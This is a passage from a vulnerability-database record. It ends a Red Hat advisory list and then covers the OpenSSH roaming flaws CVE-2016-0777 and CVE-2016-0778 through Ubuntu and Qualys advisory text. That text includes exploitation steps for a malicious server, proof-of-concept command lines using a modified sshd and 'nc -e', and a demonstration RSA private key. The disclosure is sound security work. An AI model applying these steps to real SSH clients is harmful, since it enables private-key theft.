- CVE-2014-3523 httpd: WinNT MPM denial of service\n1196737 - CVE-2015-0209 openssl: use-after-free on invalid EC private key import\n1202366 - CVE-2015-0286 openssl: invalid pointer use in ASN1_TYPE_cmp()\n1227574 - CVE-2015-3216 openssl: Crash in ssleay_rand_bytes due to locking regression\n1228611 - CVE-2014-8176 OpenSSL: Invalid free in DTLS\n1243888 - CVE-2015-3185 httpd: ap_some_auth_required() does not properly indicate authenticated request in 2.4\n1288320 - CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter\n1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak\n1288326 - CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint\n1310596 - CVE-2016-0705 OpenSSL: Double-free in DSA code\n1310599 - CVE-2016-0702 OpenSSL: Side channel attack on modular exponentiation\n1311880 - CVE-2016-0797 OpenSSL: BN_hex2bn/BN_dec2bn NULL pointer deref/heap corruption\n1312219 - CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions\n1314757 - CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds\n1319829 - CVE-2016-3627 libxml2: stack exhaustion while parsing xml files in recovery mode\n1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data\n1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder\n1331426 - CVE-2016-2107 openssl: Padding oracle in AES-NI CBC MAC check\n1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow\n1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow\n1332443 - CVE-2016-3705 libxml2: stack overflow before detecting invalid XML file\n1332820 - CVE-2016-4483 libxml2: out-of-bounds read\n1338682 - CVE-2016-1833 libxml2: Heap-based buffer overread in htmlCurrentChar\n1338686 - CVE-2016-4447 libxml2: Heap-based buffer underreads due to xmlParseName\n1338691 - CVE-2016-1835 libxml2: Heap use-after-free in xmlSAX2AttributeNs\n1338696 - CVE-2016-1837 libxml2: Heap use-after-free in htmlPArsePubidLiteral and htmlParseSystemiteral\n1338700 - CVE-2016-4448 libxml2: Format string vulnerability\n1338701 - CVE-2016-4449 libxml2: Inappropriate fetch of entities content\n1338702 - CVE-2016-1836 libxml2: Heap use-after-free in xmlDictComputeFastKey\n1338703 - CVE-2016-1839 libxml2: Heap-based buffer overread in xmlDictAddString\n1338705 - CVE-2016-1838 libxml2: Heap-based buffer overread in xmlPArserPrintFileContextInternal\n1338706 - CVE-2016-1840 libxml2: Heap-buffer-overflow in xmlFAParserPosCharGroup\n1338708 - CVE-2016-1834 libxml2: Heap-buffer-overflow in xmlStrncat\n1338711 - CVE-2016-1762 libxml2: Heap-based buffer-overread in xmlNextChar\n1341583 - CVE-2016-4459 mod_cluster: Buffer overflow in mod_manager when sending request with long JVMRoute\n1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase\n1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation\n1362183 - CVE-2016-5419 curl: TLS session resumption client cert bypass\n1362190 - CVE-2016-5420 curl: Re-using connection with wrong client cert\n1373229 - CVE-2016-7141 curl: Incorrect reuse of client certificates\n1382352 - CVE-2016-6808 mod_jk: Buffer overflow when concatenating virtual host name and URI\n1387605 - CVE-2016-8612 JBCS mod_cluster: Protocol parsing logic error\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]\nJBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service\n\n6. References:\n\nhttps://access.redhat.com/security/cve/CVE-2012-1148\nhttps://access.redhat.com/security/cve/CVE-2014-3523\nhttps://access.redhat.com/security/cve/CVE-2014-8176\nhttps://access.redhat.com/security/cve/CVE-2015-0209\nhttps://access.redhat.com/security/cve/CVE-2015-0286\nhttps://access.redhat.com/security/cve/CVE-2015-3185\nhttps://access.redhat.com/security/cve/CVE-2015-3194\nhttps://access.redhat.com/security/cve/CVE-2015-3195\nhttps://access.redhat.com/security/cve/CVE-2015-3196\nhttps://access.redhat.com/security/cve/CVE-2015-3216\nhttps://access.redhat.com/security/cve/CVE-2016-0702\nhttps://access.redhat.com/security/cve/CVE-2016-0705\nhttps://access.redhat.com/security/cve/CVE-2016-0797\nhttps://access.redhat.com/security/cve/CVE-2016-0799\nhttps://access.redhat.com/security/cve/CVE-2016-1762\nhttps://access.redhat.com/security/cve/CVE-2016-1833\nhttps://access.redhat.com/security/cve/CVE-2016-1834\nhttps://access.redhat.com/security/cve/CVE-2016-1835\nhttps://access.redhat.com/security/cve/CVE-2016-1836\nhttps://access.redhat.com/security/cve/CVE-2016-1837\nhttps://access.redhat.com/security/cve/CVE-2016-1838\nhttps://access.redhat.com/security/cve/CVE-2016-1839\nhttps://access.redhat.com/security/cve/CVE-2016-1840\nhttps://access.redhat.com/security/cve/CVE-2016-2105\nhttps://access.redhat.com/security/cve/CVE-2016-2106\nhttps://access.redhat.com/security/cve/CVE-2016-2107\nhttps://access.redhat.com/security/cve/CVE-2016-2108\nhttps://access.redhat.com/security/cve/CVE-2016-2109\nhttps://access.redhat.com/security/cve/CVE-2016-2177\nhttps://access.redhat.com/security/cve/CVE-2016-2178\nhttps://access.redhat.com/security/cve/CVE-2016-2842\nhttps://access.redhat.com/security/cve/CVE-2016-3627\nhttps://access.redhat.com/security/cve/CVE-2016-3705\nhttps://access.redhat.com/security/cve/CVE-2016-4447\nhttps://access.redhat.com/security/cve/CVE-2016-4448\nhttps://access.redhat.com/security/cve/CVE-2016-4449\nhttps://access.redhat.com/security/cve/CVE-2016-4459\nhttps://access.redhat.com/security/cve/CVE-2016-4483\nhttps://access.redhat.com/security/cve/CVE-2016-5419\nhttps://access.redhat.com/security/cve/CVE-2016-5420\nhttps://access.redhat.com/security/cve/CVE-2016-6808\nhttps://access.redhat.com/security/cve/CVE-2016-7141\nhttps://access.redhat.com/security/cve/CVE-2016-8612\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=core.service.apachehttp\u0026downloadType=distributions\u0026version=2.4.23\nhttps://access.redhat.com/documentation/en/red-hat-jboss-core-services-apache-http-server/version-2.4.23/apache-http-server-2423-release-notes/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc",
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VAR-201601-0030
Vulnerability from variot - Updated: 2026-04-10 22:09The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. In addition, JVNVU#95595627 Then CWE-122 It is published as CWE-122: Heap-based Buffer Overflow http://cwe.mitre.org/data/definitions/122.htmlA large amount of transfer is requested by the remote server, resulting in a denial of service ( Heap-based buffer overflow ) It can be unspecified, such as being put into a state. OpenSSH is prone to a heap-based buffer-overflow vulnerability. Successful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. ============================================================================ Ubuntu Security Notice USN-2869-1 January 14, 2016
openssh vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.10
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
OpenSSH could be made to expose sensitive information over the network.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: openssh-client 1:6.9p1-2ubuntu0.1
Ubuntu 15.04: openssh-client 1:6.7p1-5ubuntu1.4
Ubuntu 14.04 LTS: openssh-client 1:6.6p1-2ubuntu2.4
Ubuntu 12.04 LTS: openssh-client 1:5.9p1-5ubuntu1.8
In general, a standard system update will make all the necessary changes. Qualys Security Advisory
Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778
======================================================================== Contents ========================================================================
Summary Information Leak (CVE-2016-0777) - Analysis - Private Key Disclosure - Mitigating Factors - Examples Buffer Overflow (CVE-2016-0778) - Analysis - Mitigating Factors - File Descriptor Leak Acknowledgments Proof Of Concept
======================================================================== Summary ========================================================================
Since version 5.4 (released on March 8, 2010), the OpenSSH client supports an undocumented feature called roaming: if the connection to an SSH server breaks unexpectedly, and if the server supports roaming as well, the client is able to reconnect to the server and resume the suspended SSH session. This information leak may have already been exploited in the wild by sophisticated attackers, and high-profile sites or users may need to regenerate their SSH keys accordingly.
The buffer overflow, on the other hand, is present in the default configuration of the OpenSSH client but its exploitation requires two non-default options: a ProxyCommand, and either ForwardAgent (-A) or ForwardX11 (-X). This buffer overflow is therefore unlikely to have any real-world impact, but provides a particularly interesting case study.
All OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be easily hot-fixed by setting the undocumented option "UseRoaming" to "no", as detailed in the Mitigating Factors section. OpenSSH version 7.1p2 (released on January 14, 2016) disables roaming by default.
======================================================================== Information Leak (CVE-2016-0777) ========================================================================
Analysis
If the OpenSSH client connects to an SSH server that offers the key exchange algorithm "resume@appgate.com", it sends the global request "roaming@appgate.com" to the server, after successful authentication. If this request is accepted, the client allocates a roaming buffer out_buf, by calling malloc() (and not calloc()) with an out_buf_size that is arbitrarily chosen by the server:
63 void 64 roaming_reply(int type, u_int32_t seq, void *ctxt) 65 { 66 if (type == SSH2_MSG_REQUEST_FAILURE) { 67 logit("Server denied roaming"); 68 return; 69 } 70 verbose("Roaming enabled"); .. 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size()); .. 77 }
40 static size_t out_buf_size = 0; 41 static char out_buf = NULL; 42 static size_t out_start; 43 static size_t out_last; .. 75 void 76 set_out_buffer_size(size_t size) 77 { 78 if (size == 0 || size > MAX_ROAMBUF) 79 fatal("%s: bad buffer size %lu", func, (u_long)size); 80 / 81 * The buffer size can only be set once and the buffer will live 82 * as long as the session lives. 83 */ 84 if (out_buf == NULL) { 85 out_buf_size = size; 86 out_buf = xmalloc(size); 87 out_start = 0; 88 out_last = 0; 89 } 90 }
The OpenSSH client's roaming_write() function, a simple wrapper around write(), calls wait_for_roaming_reconnect() to transparently reconnect to the SSH server after a disconnection. It also calls buf_append() to copy the data sent to the server into the roaming buffer out_buf. During a reconnection, the client is therefore able to resend the data that was not received by the server because of the disconnection:
198 void 199 resend_bytes(int fd, u_int64_t offset) 200 { 201 size_t available, needed; 202 203 if (out_start < out_last) 204 available = out_last - out_start; 205 else 206 available = out_buf_size; 207 needed = write_bytes - offset; 208 debug3("resend_bytes: resend %lu bytes from %llu", 209 (unsigned long)needed, (unsigned long long)*offset); 210 if (needed > available) 211 fatal("Needed to resend more data than in the cache"); 212 if (out_last < needed) { 213 int chunkend = needed - out_last; 214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend, 215 chunkend); 216 atomicio(vwrite, fd, out_buf, out_last); 217 } else { 218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed); 219 } 220 }
In the OpenSSH client's roaming buffer out_buf, the most recent data sent to the server begins at index out_start and ends at index out_last. As soon as this circular buffer is full, buf_append() maintains the invariant "out_start = out_last + 1", and consequently three different cases have to be considered:
-
"out_start < out_last" (lines 203-204): out_buf is not full yet (and out_start is still equal to 0), and the amount of data available in out_buf is indeed "out_last - out_start";
-
"out_start > out_last" (lines 205-206): out_buf is full (and out_start is exactly equal to "out_last + 1"), and the amount of data available in out_buf is indeed the entire out_buf_size;
-
"out_start == out_last" (lines 205-206): no data was ever written to out_buf (and both out_start and out_last are still equal to 0) because no data was ever sent to the server after roaming_reply() was called, but the client sends (leaks) the entire uninitialized out_buf to the server (line 214), as if out_buf_size bytes of data were available.
In order to successfully exploit this information leak and retrieve sensitive information from the OpenSSH client's memory (for example, private SSH keys, or memory addresses useful for further exploitation), a malicious server needs to:
-
Massage the client's heap before roaming_reply() malloc()ates out_buf, and force malloc() to return a previously free()d but uncleansed chunk of sensitive information. The simple proof-of-concept in this advisory does not implement heap massaging.
-
Guess the client's get_snd_buf_size() in order to precisely control out_buf_size. OpenSSH < 6.0 accepts out_buf sizes in the range (0,4G), and OpenSSH >= 6.0 accepts sizes in the range (0,2M]. Sizes smaller than get_snd_buf_size() are attainable because roaming_reply() does not protect "packet_get_int() + get_snd_buf_size()" against integer wraparound. The proof-of-concept in this advisory attempts to derive the client's get_snd_buf_size() from the get_recv_buf_size() sent by the client to the server, and simply chooses a random out_buf_size.
-
Advise the client's resend_bytes() that all "available" bytes (the entire out_buf_size) are "needed" by the server, even if fewer bytes were actually written by the client to the server (because the server controls the "offset" argument, and resend_bytes() does not protect "needed = write_bytes - offset" against integer wraparound).
Finally, a brief digression on a minor bug in resend_bytes(): on 64-bit systems, where "chunkend" is a 32-bit signed integer, but "out_buf" and "out_buf_size" are 64-bit variables, "out_buf + out_buf_size - chunkend" may point out-of-bounds, if chunkend is negative (if out_buf_size is in the [2G,4G) range). This negative chunkend is then converted to a 64-bit size_t greater than SSIZE_MAX when passed to atomicio(), and eventually returns EFAULT when passed to write() (at least on Linux and OpenBSD), thus avoiding an out-of-bounds read from the OpenSSH client's memory.
Private Key Disclosure
We initially believed that this information leak in the OpenSSH client's roaming code would not allow a malicious SSH server to steal the client's private keys, because:
-
the information leaked is not read from out-of-bounds memory, but from a previously free()d chunk of memory that is recycled to malloc()ate the client's roaming buffer out_buf;
-
private keys are loaded from disk into memory and freed by key_free() (old API, OpenSSH < 6.7) or sshkey_free() (new API, OpenSSH >= 6.7), and both functions properly cleanse the private keys' memory with OPENSSL_cleanse() or explicit_bzero();
-
temporary copies of in-memory private keys are freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse these copies with memset() or bzero().
However, we eventually identified three reasons why, in our experiments, we were able to partially or completely retrieve the OpenSSH client's private keys through this information leak (depending on the client's version, compiler, operating system, heap layout, and private keys):
(besides these three reasons, other reasons may exist, as suggested by the CentOS and Fedora examples at the end of this section)
-
If a private SSH key is loaded from disk into memory by fopen() (or fdopen()), fgets(), and fclose(), a partial or complete copy of this private key may remain uncleansed in memory. Indeed, these functions manage their own internal buffers, and whether these buffers are cleansed or not depends on the OpenSSH client's libc (stdio) implementation, but not on OpenSSH itself.
-
In all vulnerable OpenSSH versions, SSH's main() function calls load_public_identity_files(), which loads the client's public keys with fopen(), fgets(), and fclose(). Unfortunately, the private keys (without the ".pub" suffix) are loaded first and then discarded, but nonetheless buffered in memory by the stdio functions.
-
In OpenSSH versions <= 5.6, the load_identity_file() function (called by the client's public-key authentication method) loads a private key with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses fgets() and hence internal stdio buffering.
Internal stdio buffering is the most severe of the three problems discussed in this section, although GNU/Linux is not affected because the glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. BSD-based systems, on the other hand, are severely affected because they simply malloc()ate and free() stdio buffers. For interesting comments on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk
-
In OpenSSH versions >= 5.9, the client's load_identity_file() function (called by the public-key authentication method) read()s a private key in 1024-byte chunks that are appended to a growing buffer (a realloc()ating buffer) with buffer_append() (old API) or sshbuf_put() (new API). Unfortunately, the repeated calls to realloc() may leave partial copies of the private key uncleansed in memory.
-
In OpenSSH < 6.7 (old API), the initial size of such a growing buffer is 4096 bytes: if a private-key file is larger than 4K, a partial copy of this private key may remain uncleansed in memory (a 3K copy in a 4K buffer). Fortunately, only the file of a very large RSA key (for example, an 8192-bit RSA key) can exceed 4K.
-
In OpenSSH >= 6.7 (new API), the initial size of a growing buffer is 256 bytes: if a private-key file is larger than 1K (the size passed to read()), a partial copy of this private key may remain uncleansed in memory (a 1K copy in a 1K buffer). For example, the file of a default-sized 2048-bit RSA key exceeds 1K.
For more information on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources
https://cwe.mitre.org/data/definitions/244.html
- An OpenSSH growing-buffer that holds a private key is eventually freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse the buffer with memset() or bzero() before they call free(). Unfortunately, an optimizing compiler may remove this memset() or bzero() call, because the buffer is written to, but never again read from (an optimization known as Dead Store Elimination).
OpenSSH 6.6 is the only version that is not affected, because it calls explicit_bzero() instead of memset() or bzero().
Dead Store Elimination is the least severe of the three problems explored in this section, because older GCC versions do not remove the memset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5 and Clang/LLVM do, however, remove it. For detailed discussions of this issue:
https://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations
https://cwe.mitre.org/data/definitions/14.html
https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506
Finally, for these three reasons, passphrase-encrypted SSH keys are leaked in their encrypted form, but an attacker may attempt to crack the passphrase offline. On the other hand, SSH keys that are available only through an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the undocumented option "UseRoaming no" to the system-wide configuration file (usually /etc/ssh/ssh_config), or per-user configuration file (~/.ssh/config), or command-line (-o "UseRoaming no").
- If an OpenSSH client is disconnected from an SSH server that offers roaming, it prints "[connection suspended, press return to resume]" on stderr, and waits for '\n' or '\r' on stdin (and not on the controlling terminal) before it reconnects to the server; advanced users may become suspicious and press Control-C or Control-Z instead, thus avoiding the information leak:
"pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume]^Z [1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1
However, SSH commands that use the local stdin to transfer data to the remote server are bound to trigger this reconnection automatically (upon reading a '\n' or '\r' from stdin). Moreover, these non-interactive SSH commands (for example, backup scripts and cron jobs) commonly employ public-key authentication and are therefore perfect targets for this information leak:
$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.ls" [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.tar" tar: Removing leading `/' from member names [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] ... [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
Similarly, the SCP client uses the SSH client's stdin and stdout to transfer data, and can be forced by a malicious SSH server to output a control record that ends in '\n' (an error message in server-to-client mode, or file permissions in client-to-server mode); this '\n' is then read from stdin by the fgetc() call in wait_for_roaming_reconnect(), and triggers an automatic reconnection that allows the information leak to be exploited without user interaction:
env ROAMING="scp_mode sleep:1" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp $ [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting] lost connection
-
Although a man-in-the-middle attacker can reset the TCP connection between an OpenSSH client and an OpenSSH server (which does not support roaming), it cannot exploit the information leak without breaking server host authentication or integrity protection, because it needs to:
-
first, append the "resume@appgate.com" algorithm name to the server's initial key exchange message;
-
second, in response to the client's "roaming@appgate.com" request, change the server's reply from failure to success.
In conclusion, an attacker who wishes to exploit this information leak must convince its target OpenSSH client to connect to a malicious server (an unlikely scenario), or compromise a trusted server (a more likely scenario, for a determined attacker).
-
In the client, wait_for_roaming_reconnect() calls ssh_connect(), the same function that successfully established the first connection to the server; this function supports four different connection methods, but each method contains a bug and may fail to establish a second connection to the server:
-
In OpenSSH >= 6.5 (released on January 30, 2014), the default ssh_connect_direct() method (a simple TCP connection) is called by wait_for_roaming_reconnect() with a NULL aitop argument, which makes it impossible for the client to reconnect to the server:
418 static int 419 ssh_connect_direct(const char host, struct addrinfo aitop, ... 424 int sock = -1, attempt; 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV]; ... 430 for (attempt = 0; attempt < connection_attempts; attempt++) { ... 440 for (ai = aitop; ai; ai = ai->ai_next) { ... 470 } 471 if (sock != -1) 472 break; / Successful connection. / 473 } 474 475 / Return failure if we didn't get a successful connection. / 476 if (sock == -1) { 477 error("ssh: connect to host %s port %s: %s", 478 host, strport, strerror(errno)); 479 return (-1); 480 }
Incidentally, this error() call displays stack memory from the uninitialized strport[] array, a byproduct of the NULL aitop:
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor
- The special ProxyCommand "-" communicates with the server through the client's stdin and stdout, but these file descriptors are close()d by packet_backup_state() at the beginning of wait_for_roaming_reconnect() and are never reopened again, making it impossible for the client to reconnect to the server. Moreover, the fgetc() that waits for '\n' or '\r' on the closed stdin returns EOF and forces the client to exit():
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/nc -e "/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1" 127.0.0.1 222 Pseudo-terminal will not be allocated because stdin is not a terminal. user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that passes a connected file descriptor back to the client, but it calls fatal() while reconnecting to the server, because waitpid() returns ECHILD; indeed, the SIGCHLD handler (installed by SSH's main() after the first successful connection to the server) calls waitpid() before ssh_proxy_fdpass_connect() does:
1782 static void 1783 main_sigchld_handler(int sig) 1784 { .... 1789 while ((pid = waitpid(-1, &status, WNOHANG)) > 0 || 1790 (pid < 0 && errno == EINTR)) 1791 ; 1792 1793 signal(sig, main_sigchld_handler); .... 1795 }
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 121 / Fork and execute the proxy command. / 122 if ((pid = fork()) == 0) { ... 157 } 158 / Parent. / ... 167 while (waitpid(pid, NULL, 0) == -1) 168 if (errno != EINTR) 169 fatal("Couldn't wait for child: %s", strerror(errno));
$ /usr/bin/ssh -V OpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015
$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand="/usr/bin/nc -F %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Couldn't wait for child: No child processes
- The method ssh_proxy_connect() fork()s a standard ProxyCommand that connects the client to the server, but if a disconnection occurs, and the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is waiting for a '\n' or '\r' on stdin, EOF is returned (the underlying read() returns EINTR) and the client exit()s before it can reconnect to the server:
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh -o ProxyCommand="/bin/nc %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
This behavior is intriguing, because (at least on Linux and BSD) the signal() call that installed the main_sigchld_handler() is supposed to be equivalent to a sigaction() call with SA_RESTART. However, portable versions of OpenSSH override signal() with mysignal(), a function that calls sigaction() without SA_RESTART.
This last mitigating factor is actually a race-condition bug that depends on the ProxyCommand itself: for example, the client never fails to reconnect to the server when using Socat as a ProxyCommand, but fails occasionally when using Netcat.
Private Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key
$ head -n 1 /etc/motd FreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme vOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi /rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE K+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr +7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n UxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7 qsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11 1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV pmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs= -----END RSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:1280" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-97ed9f59/infoleak
